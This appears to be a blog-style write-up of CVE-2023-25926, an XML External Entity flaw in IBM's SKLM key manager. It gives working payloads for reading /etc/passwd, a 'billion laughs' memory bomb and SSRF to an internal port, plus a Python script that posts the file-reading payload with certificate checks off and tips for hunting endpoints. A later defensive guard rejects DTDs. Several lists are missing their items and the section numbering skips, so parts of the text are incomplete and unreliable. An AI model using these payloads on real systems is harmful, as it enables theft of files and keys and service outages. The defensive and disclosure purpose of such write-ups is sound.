IBM Security Guardium Key Lifecycle Manager (SKLM) is a widely used solution for enterprise key management, providing secure key generation, storage, and distribution for data-at-rest encryption. However, a recently discovered vulnerability, CVE-2023-25926, exposes a critical weakness in how SKLM handles XML input. The flaw allows an XML External Entity (XXE) Injection attack, enabling attackers to read sensitive files or cause a denial of service, and it affects every organization that relies on SKLM for its encryption keys.
This long read explains the vulnerability in simple terms, shows real exploit examples, and provides practical clues to help you identify and mitigate the risk. All content is exclusive and written in plain, straightforward language.
4.1.1
IBM X-Force ID: 247599
See IBM Security Bulletin: CVE-2023-25926
What is XXE?
XML External Entity (XXE) Injection is a vulnerability that occurs when an XML parser blindly accepts and processes external entities provided in user-supplied XML. If not properly configured, the parser may allow attackers to:
Vulnerability Details
The problem lies in SKLM's XML processing. When externally supplied XML is accepted for certain operations (for example, key management functions exposed through its web service), SKLM does not properly restrict XML external entities. This allows a remote attacker to craft malicious XML to:
Crash or stress the server by allocating huge memory
IBM has fixed this problem in later releases, but many companies still use the affected versions.
Exploit Details (with Example)
To exploit this XXE, an attacker needs to send a specially crafted XML payload to a vulnerable SKLM endpoint listening for XML input.
1. Basic File Disclosure
Here’s how an attacker might read a sensitive file such as /etc/passwd (on a Unix-like OS) by injecting an external entity into the XML data.
Malicious XML Example
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>
&xxe;
</foo>
How it works:
- The <!ENTITY xxe SYSTEM "file:///etc/passwd" > line causes the XML parser to fetch the contents of /etc/passwd.
- When SKLM parses this, it will replace &xxe; with the actual content of the file and may include it in the system’s response or log.
Attackers can also exhaust the server's memory with recursive entity expansion, the classic "billion laughs" payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>
3. Network (SSRF, etc.)
If the server has outbound network access, a similar payload can force SKLM to open connections to internal services, which may disclose further sensitive information or be abused for port scanning.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/secret" >
]>
<request>
&xxe;
</request>
The following script demonstrates POSTing malicious XML to a hypothetical SKLM endpoint:
import requests

# Hypothetical endpoint; the real path depends on the SKLM deployment.
url = "https://sklm.example.com/api/xmlEndpoint"
headers = {"Content-Type": "application/xml"}
# The same file-disclosure payload shown above.
xml_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>
&xxe;
</foo>
"""
# verify=False disables TLS certificate checking for this request.
response = requests.post(url, data=xml_payload, headers=headers, verify=False)
print("Status:", response.status_code)
print("Response:", response.text)
*Warning:* Running this against a production SKLM instance without authorization is illegal and unethical.
Attackers and pentesters often look for admin and service endpoints, such as:
- /api/*
- /ws/*
- /sklm/services/*
You can find XML POST/PUT requests in the product documentation or through trial and error (using tools like Burp Suite).
Watch for unusual content or failed XML parses.
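As an added example (not code from this page or from IBM), the following pre-parse guard applies the standard XXE mitigation of refusing any request that carries a DOCTYPE, and records which of the three payload patterns above a refused request matches (an external entity URI, or an internal-entity expansion estimate above a limit) so the event can be logged. The sample documents are constructed from the payloads shown earlier; the benign KeyRequest document is a hypothetical shape, not SKLM's real request format.

```python
import re
# The DTD constructs XXE depends on. The OWASP-recommended mitigation is to
# disallow DTDs entirely; this guard applies that policy before any parsing.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b")
INTERNAL_ENTITY_RE = re.compile(r"""<!ENTITY\s+(?P<name>[^\s%>]+)\s+(?P<q>["'])(?P<value>.*?)(?P=q)""", re.S)
EXTERNAL_ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?P<name>[^\s%>]+)\s+(?:SYSTEM|PUBLIC\s+(?P<pq>["'])[^"']*(?P=pq))\s*(?P<q>["'])(?P<uri>[^"']*)(?P=q)""")
REF_RE = re.compile(r"&([A-Za-z_][\w.-]*);")  # general entity reference, e.g. &xxe;

def entity_sizes(entities: dict) -> dict:
    """Fully expanded length of each internal entity, computed without expanding anything."""
    sizes = {}
    def size(name, visiting=frozenset()):
        if name not in entities:
            return 0  # external or undeclared: nothing to expand in-process
        if name in visiting:
            raise ValueError(f"recursive entity reference: {name}")
        if name not in sizes:  # memoised, so nested fan-out costs one call per entity
            sizes[name] = len(REF_RE.sub("", entities[name])) + sum(
                size(ref, visiting | {name}) for ref in REF_RE.findall(entities[name]))
        return sizes[name]
    for name in entities:
        size(name)
    return sizes

def check_xml(doc: str, max_expansion: int = 10_000) -> dict:
    """Refuse any request that carries a DOCTYPE and record why, for the request log."""
    if not DOCTYPE_RE.search(doc):
        return {"allowed": True, "findings": [], "expansion": 0}
    findings = ["DOCTYPE present: DTD rejected by policy"]
    for m in EXTERNAL_ENTITY_RE.finditer(doc):
        findings.append(f"external entity {m['name']} -> {m['uri']}")
    entities = {m["name"]: m["value"] for m in INTERNAL_ENTITY_RE.finditer(doc)}
    try:
        sizes = entity_sizes(entities)
        expansion = sum(sizes.get(r, 0) for r in REF_RE.findall(doc.split("]>", 1)[-1]))
    except ValueError as err:
        findings.append(str(err))
        expansion = max_expansion + 1
    if expansion > max_expansion:
        findings.append(f"entity expansion: {expansion} chars from a {len(doc)}-char request")
    return {"allowed": False, "findings": findings, "expansion": expansion}

# Constructed samples, condensed from the three payloads shown above.
FILE_XXE = '<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
SSRF_XXE = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/secret">]><request>&xxe;</request>'
BOMB = ('<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">' + "".join(
    f'<!ENTITY lol{i} "{"&lol%s;" % (i - 1 or "") * 10}">' for i in range(1, 5)) + ']><lolz>&lol4;</lolz>')
CLEAN = '<?xml version="1.0"?><KeyRequest><alias>key-01</alias></KeyRequest>'  # hypothetical benign request
```

The expansion estimate is derived from the entity declarations alone, so the guard never materialises the payload it is measuring and cannot itself be exhausted by it.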
Official Fixes and Updates:
- IBM Security Bulletin: CVE-2023-25926
References and Further Reading
- IBM Security Bulletin: XXE on SKLM (CVE-2023-25926)
- MITRE CVE Detail for CVE-2023-25926
- OWASP: XML External Entity (XXE) Processing
- IBM X-Force Exchange: Report 247599
Conclusion
CVE-2023-25926 is a textbook XXE vulnerability, but in a critical encryption product like IBM SKLM its impact is far greater. An attacker with nothing more than network access to the service can potentially read sensitive files or take encryption infrastructure offline with a few lines of malicious XML. All affected users should patch immediately or apply the workarounds in the IBM bulletin. Understanding and hunting for these flaws is vital for every security team.
Timeline
Published on: 02/29/2024 01:38:24 UTC
Last modified on: 02/29/2024 13:49:47 UTC